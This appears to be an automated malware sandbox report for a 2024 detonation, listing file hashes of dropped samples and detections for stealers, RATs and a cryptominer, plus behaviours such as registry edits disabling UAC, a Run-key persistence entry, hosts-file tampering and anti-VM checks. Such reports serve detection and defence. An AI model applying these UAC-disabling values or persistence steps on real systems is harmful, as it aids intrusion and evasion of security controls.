| MD5 | c2eb31234fe828d47909a1f60d569f52 |
| SHA1 | 980e0eb574e9474c14df00219eb3c4ce37cb8b6d |
| SHA256 | 4a35f6b787eedb2a6eb70b5f312e4d372d380f8faab0e5feee6eaa65784b3e94 |
| SHA512 | 0a0ca77a15c980fbfc2168cea46d29939ba016c4aa1f8e0485c20dcc14b3609ff44331942f9ee193eb6e84c8b9854c1a12ad76becaabbb9921b0a9968a09cf42 |
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
| MD5 | ab3f75f41982ca216badc3e56f9d3e88 |
| SHA1 | ee26477ee9d90af2e940e6f99617e7d54b241635 |
| SHA256 | e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08 |
| SHA512 | 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | fcdf1962a9323eaea99ed4f72775093e |
| SHA1 | 277f044d4ab9a5ba6b8f8ee4a7c0e3880f6c53f2 |
| SHA256 | 28cfeccffb6bcec816783f0205cfdd71517b275c8e595b2ec5e988628499955b |
| SHA512 | f39fc7265c5d2ae78956f1352419477cbdd5bc80cfbded6777393cc5351276ac081b23c96f23c4fe6e1910915053829fa18e122bb97eba3667d46b52084769a4 |
C:\Users\Admin\AppData\Local\Temp\a\gcapi.dll
| MD5 | 1ce7d5a1566c8c449d0f6772a8c27900 |
| SHA1 | 60854185f6338e1bfc7497fd41aa44c5c00d8f85 |
| SHA256 | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf |
| SHA512 | 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753 |
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
| MD5 | 0c1a360f7ca0e6289d8403f1ebfa4690 |
| SHA1 | 891483904f22cf6495bd310c4bf7c05fc42b85ba |
| SHA256 | 2d1a3f0c2f05f3d0ee2c4c4d49abd370b0a9e9c811a98c07f8d06c368d46dffe |
| SHA512 | f10cd6843b457e1abb0b43ec716c23e8a093dd46750ea1f378e90108f28fa6c7a02d1b9227b7b9dcf9d2e8de6489cf9f6d1d24381d2aea55e6b9dd3fba55a118 |
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
| MD5 | c566295ef2f48b51a4932af0aa993e48 |
| SHA1 | 0b69f71e7f624a8b5f4b502fde9de972a94543ff |
| SHA256 | f096fd252e752b20a37c8963bb0ef947e7a7a1794552db8b5642523db9357d8f |
| SHA512 | d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c |
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
| MD5 | 3f44dd7f287da4a9a1be82e5178b7dc8 |
| SHA1 | 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9 |
| SHA256 | e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225 |
| SHA512 | 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03 |
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
| MD5 | 2ca5f321b0683c4cdd64c2ab7761c2db |
| SHA1 | 1af4717e30ee791aa16c88f5d319bc949bdec2d5 |
| SHA256 | b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4 |
| SHA512 | a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff |
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
| MD5 | 8b712dbac428c4107c3c44f92743d8e6 |
| SHA1 | 65027334951d9be6149627fef6a45f2397cfe747 |
| SHA256 | fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3 |
| SHA512 | e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e |
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
| MD5 | d25c3bd6c96b1d4b95f492a9daa4a6a1 |
| SHA1 | 9b4f388fec4511ce3fa5bf855626c7c7b517ac21 |
| SHA256 | fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9 |
| SHA512 | 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a |
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
| MD5 | ac1997ffe0c45d75cec0f1bbfe24cd62 |
| SHA1 | 67f28f8d9ff0a2f3a6d84948f541b204339a26e4 |
| SHA256 | 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a |
| SHA512 | 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144 |
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
| MD5 | 6304ce36f17952d70bceb540d4b916ac |
| SHA1 | 737d2ecf8f514e85c2776416100eefb5ea23391c |
| SHA256 | 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78 |
| SHA512 | 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 25e71767a94343d45dd3e066c05784bf |
| SHA1 | 901ae90156458e9b91f29cb0789964a5bfbc1127 |
| SHA256 | 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525 |
| SHA512 | ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4f559d9257cbacf85aaeb62f530c70cd |
| SHA1 | 23c369aeb9a8f6e8c036291a159bfa94b7595f91 |
| SHA256 | 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598 |
| SHA512 | 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389 |
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
| MD5 | 8e0d340e723ce188de651b8ffb887d81 |
| SHA1 | cb90a07f1a4ffae68cca6281325606009d3d7266 |
| SHA256 | 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7 |
| SHA512 | d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1 |
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
| MD5 | d9694a6a1989d79aeded3f93cb97d24e |
| SHA1 | a18019b9793029dac4d10e619ec85ea26909336a |
| SHA256 | 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c |
| SHA512 | 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 97d9059805b59a38cef6036e01ac9056 |
| SHA1 | 40429fc8a0d83c6f06f35597e86cc27ef34e1603 |
| SHA256 | 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc |
| SHA512 | eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041 |
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
| MD5 | e364a1bd0e0be70100779ff5389a78da |
| SHA1 | dd8269db6032720dbac028931e28a6588fca7bae |
| SHA256 | 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e |
| SHA512 | ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 00492073968f429aa15f846b05734abd |
| SHA1 | 10c780c8823c596b573920a9512669f835b0a4cd |
| SHA256 | e1d9080aefbe65664c44397a1f32ff65fd9d7d2c3be70b798b96eb5996dd89d9 |
| SHA512 | 27f2940415119814410ce466acee0c98e04f4ddccac2532f9cb2db97916c5f0187c8c759649e91fd2373e85da6a9b89ccd9d5486a5741528ff9a853ac26116f8 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4632db03390d946c7203ab740ed675ae |
| SHA1 | dd1bf137dfc473f27812141d26c7637a5f52762f |
| SHA256 | 1137936891f91d3564d2f2a12c35f551c8dc5036c914a3610f111e550852a5c8 |
| SHA512 | cdded7ac54483b1bebc7ff7505f7d0381f1b1a97648b8e963b0084f33a465084d1e1b3213428a8d9726bb68027b6fbeface3eecb1941c93cd6dc7620b3c9446a |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4b7c630cdf106dbb92bf5956e18d6ea0 |
| SHA1 | df632a9931de7360b9b9c14c1c95db83daf45b1a |
| SHA256 | e3036170507bfd31fd5a734f7d3b2cb10e980f89bb1962361d6ab786d23431c9 |
| SHA512 | 4f076d2a0d109c53911b7fd856f144dafa2a0ec02611de4fc57584a5f458155809cf9243f8939640a1e4e1e02163838ea65c338e5d5632eff7b13bc8589f5585 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | c38812c636e3c0b5b94e15c135a736c0 |
| SHA1 | 3e3a3b0ec09b34521282ada8439730662af5d6d8 |
| SHA256 | 23f7ff585409734df1bfb29d9101bc6a8ec44a41079eebf699e568c4c10cdd36 |
| SHA512 | 5baf8d3ba715c089fe326bdd0f11c9aa62c88a7194db5ea4809780fe69c3d09b70cde2f4f8a473134692ef4b342bd3d18ea5e3c04eb51b4694e8f8b6b152940c |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 1571ac8abb5f7e94d16cda9a61f69a62 |
| SHA1 | 7537508c386ccde8da472d1aa3403d8583020123 |
| SHA256 | 141d1c772553ba42dd4cb21ed07f00bfa1db06bc19432603af5a678c5f86166b |
| SHA512 | a596f2b979bb3365358bd46dd9bd69f58c73a25186de690402bba436d7128896d0b5f4e7713d9f31b95e385b411a6ecb166fe997900e1a7ce6b7cd7319956965 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 83fab3de835e536b54070485ee73b11a |
| SHA1 | 532ea4d404622556ebf1a7c3fd061cb42163f49a |
| SHA256 | f778ecbcd94e28a5eb3eae07a1330b2b7c1a3b61241f8deb41ab71e825497504 |
| SHA512 | 64873890c80c47398d658ae85acf8cba737ba425fff706a673fa21e36feced3b8e53c9fbb56e3b91c97e5f5faf7fab46b67c2c119c632ebb21271cd9574e3e61 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4e24eeda3d3f9adb95ed2a2786b88fdf |
| SHA1 | 29d45ae55f61634bd3c3576bfac97c15f53b62e7 |
| SHA256 | c58e3c7b3c28fc414459e62cff0952a948e9e7911e1f2cc913f3523bc9599e62 |
| SHA512 | 8535aa7639e730832da0d48862d0816cfdcd04da60a8c7343c8413e22b4270b9e2e06c23d2539585a3d172fe1e5a116f2c37a4818a020e646cfac00242aa68f7 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | fed60826e671b7f25af145e3f15e24b4 |
| SHA1 | 850c792730c135de028447308d5d541812d5ddc3 |
| SHA256 | 3deb748ddd3314d4e4b1ea473fc3ca365e1915dd577da1d4de1cdaf9664fa105 |
| SHA512 | 54abd1caec3fb2dc31c602fa5bd83a182fa2274091f94ae5b562f12fd0cd41ff940926c045392b59a7e89fded056e3871f18df2cb7a01df501733ccada27303c |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 005c56c45b84451f00829acaced6dc62 |
| SHA1 | a595402d1cf107065fb8a49ebb4e3af2951ba4c8 |
| SHA256 | 5eeb209d98540e9af832980e42dbcfc7c75e6cca547434f10e7b8d8a51954cbb |
| SHA512 | fe3b3736e2842620ae7eab762121a7920fa85bd7b9bf9b7b33012ed5cb1e5a44b07f451a8db37ad75ea05dd50ea91533b275e9321a24ff933e2ad4854b447914 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4b84a7cdce3c507cffc83c37b5120db6 |
| SHA1 | 19c97c0f82a714baeb51afbe241e402352a8c743 |
| SHA256 | aaec0a4771c3203014eb4ba03c1668e00bbd2558b37505976357d2ceaed81507 |
| SHA512 | ee2f7442c431c7021c90e23fe1e3ac67f61456b7e81997f1a7d6f3d4d9b0d71dd7f73bf52c57fec12ecffe3880c957213aec15ef40c66994987dffa4e5382fb4 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 689c4334d3e224061d056d8d1f829683 |
| SHA1 | 65fdb8873fb74f9c026d5e85e7b391caa5b2627a |
| SHA256 | 492634f9770eb72f42e9a91d57b052316e04267ea53a58786be2881778b1dcf6 |
| SHA512 | 55aadb74421812140235655010078297398a2de736a8cc65b13ee08909b538152fa48a961040868a9726c36e57b834732f8ba7dc4b8aa17d8ac4716a0f7dcbb0 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | cd20b228ff83b5c360c02570358dedd8 |
| SHA1 | 30f747170dc40f1e4fc5d5c65973e73a800d500b |
| SHA256 | a93a23ba5d5c8d008d9b9e16f668517a93f33cb5296b5e897197e095280e7d34 |
| SHA512 | 6c7b4ac7f6abfe5f5a78c7ba9bc4bd233b554fbc8a69db4f4a11b3d37265cd4ab44304df88357fb64ab0db1304f223f62ef9941b5d9e98cadb64c66da46ab168 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 5f62d3b47af32ec5f9cc5823dfef4215 |
| SHA1 | c4ca9f9073a2aa89f0276b28fa7e2bfe14f7d694 |
| SHA256 | 2b137e654c82d3866ca9c2ca7083a8a234b107d6250b932a41de07853a05ec1b |
| SHA512 | 102a558809d3d109dc55a276ccb353ba8cedb19373b78ef0a22900f7c0d3ff061f13037238931fe909f4f2be017e07e4788a307a3acbc8d683f10631ca86ce87 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | bb6b202ab1606ca947990f09307d7423 |
| SHA1 | 009752509f0d5c75fc9a9cd3f23ffcbfd6c89690 |
| SHA256 | 9787480d2f8740d430cd8ef805471221c63ccf722df6e7ec5a76838cba0ccbe6 |
| SHA512 | 4224f6eaa0239cf0922f68a000ae9300feb1cf7facdb3551c32242b3285d7d2463f11c60c00a14d03258d3747dc90b325352e545c5d1d03257f5a5ffecadb7dc |
C:\ProgramData\AnyDesk\system.conf
| MD5 | f2f2e871f0e5c47c1dfd36e53b0b687d |
| SHA1 | ec4dbb3c4f7d4c36c8084cd1c7f250a58bf3a1a6 |
| SHA256 | 75af50fdae482ce053b08db23163d252906104c8d1bdaca0f58774c17d4f6b11 |
| SHA512 | d96579f87126b04ef0d675e16eab682bb582590fb11f12dda432eb391a187ed2c835d449adef35d55a796d2c23e361823061504f63b7085dd96e5217af7e461b |
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\DenyRegister.csv
| MD5 | 6ad68fcedea3ac5903538f152122de14 |
| SHA1 | cc03629c7b216e7465d490f955d221e82330ce91 |
| SHA256 | c4e755a615e8f4423afe36936df6d1010bd9629e2b37c411ca1bd2cd02ff7411 |
| SHA512 | 675082dab06f2a8fe30414d522c4ce6673a190dd7b69f9d2d4bf07678b6a819b9d22b92c09f2b53b8f1d14fda8f095b7d7f92d0de0e3337d9248c89188beb458 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WaitResume.docx
| MD5 | 1129044bf9629b34cd5fd01a1ed5a6ad |
| SHA1 | 61999fb56b01cd4dd6c254c07019762ef99f4557 |
| SHA256 | e5238dd5843917f34d4fde78b54b5a38feb1a41ce518818f4c003e486edc4f8d |
| SHA512 | 715ee50f11544de57ae79d67350d8fe701505d19d856c26b37596c48db21f5d643f1f9347492b2535e40e7b29eba6add66b0d2ccfa7a48df3a2e8f7a88f43c6e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\PublishBackup.docx
| MD5 | 8f5bf952ca67c2f7357e97e2585a2cd1 |
| SHA1 | dea1f5d43ab0ae53a33b6d814ae812a514259add |
| SHA256 | 134158bbc6a3769e6f7cd31e3134f6e1af78e4e413a26c39ce695497e016ea28 |
| SHA512 | 18c4716300628a12ae949e63090da4f8661fc6c70a931f50bcb5e238f2b8f7dda3b5711efaded1b32d660b81ef3456a038e5bbe7baf04bae046363f668799cb1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\MountOpen.docx
| MD5 | ed983cffe1754ca63b3e7d7773b97a96 |
| SHA1 | c4caf2aa596eef333c3bc7617e2c0353799ffd2a |
| SHA256 | 261737670e35373f4e4f6e1edf14252ee35d46ef52ad126ececd601606d8bfb5 |
| SHA512 | 00228cd96f2017c37fe6ff4614dd138647a1e71c0b56fe4e2f1555cf7e0ee864963724a34d394e873214f2ac3140307557b5e584c876eb2662dd930d2f6b7c46 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 9ca76314f444aade766954f10e3ede9a |
| SHA1 | 9f21b0e60014d9194747c9f984dd7963f4f32601 |
| SHA256 | 0b97e881e49945e6316aaaa94d4abf7ee08e31beb72946ae64de90471196c0ad |
| SHA512 | 67215a7f64bc5d6fe617c0eca79944fa156b54af5329a1e0e3c36db94ee45d9539ad9918440919cc86021a0d4b24d612bf5732bc207f187a5a8c9b436dec3401 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | c1bede31ffcd226a9c02ba016f01352d |
| SHA1 | e99640d2868fccba6af7b6bafa00a8d10b9ae1b0 |
| SHA256 | 4c63f319b42027c146bd3db011d3571cd7d9fe8f1684752183c7d22a4ef16cf5 |
| SHA512 | dfd5bac4cc34ccd05734346bc6a04a9a193f537498b5f4601ab2fb3e20d5c159453f8e09ab9b1ca88207a0c3673e0bad28dc3651505b4dcab5c7045faf52e458 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 69d032dc127adf8f738389483d711e9e |
| SHA1 | 6d17b1dbb9eb16572cec4ee9888c45ba1167cf77 |
| SHA256 | 4308bb8485a1b5cb1d105080d3d986e03653fcc70b5ed82048b7c62aea875d3f |
| SHA512 | 29e23842dce5b3a8e48a2acb74d57adb364476bf08fda0393c30d38749fff6916021f9ee5a731673954fe027f51c4cc81991fb8d5f4b6d9148fb9783ef87f065 |
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
| MD5 | ff7e78da9c8e580229fe95dfdfe5b098 |
| SHA1 | ab968e47e463f29426116753b0ca086fd5b33cdb |
| SHA256 | cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d |
| SHA512 | 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409 |
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
| MD5 | d6b16370cd4e60185aa88607316a0c05 |
| SHA1 | 7fbc63b1203617c67e5491745beaedb424baed78 |
| SHA256 | a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2 |
| SHA512 | 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906 |
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-12-12 18:20 |
| Reported | 2024-12-12 18:40 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 355s |
| Max time network | 1201s |
Command Line
Signatures
Azorult
Azorult family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Remcos
Remcos family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1528 created 3440 | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 3728 created 3440 | N/A | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | C:\Windows\Explorer.EXE |
| PID 5060 created 3440 | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 6332 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 2056 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 680 created 3440 | N/A | C:\ProgramData\gnabpgw\wohcj.exe | C:\Windows\Explorer.EXE |
| PID 8248 created 3440 | N/A | C:\ProgramData\gnabpgw\wohcj.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
Umbral
Umbral family
Xmrig family
Xworm
Xworm family
xmrig
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Uses browser remote debugging
A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
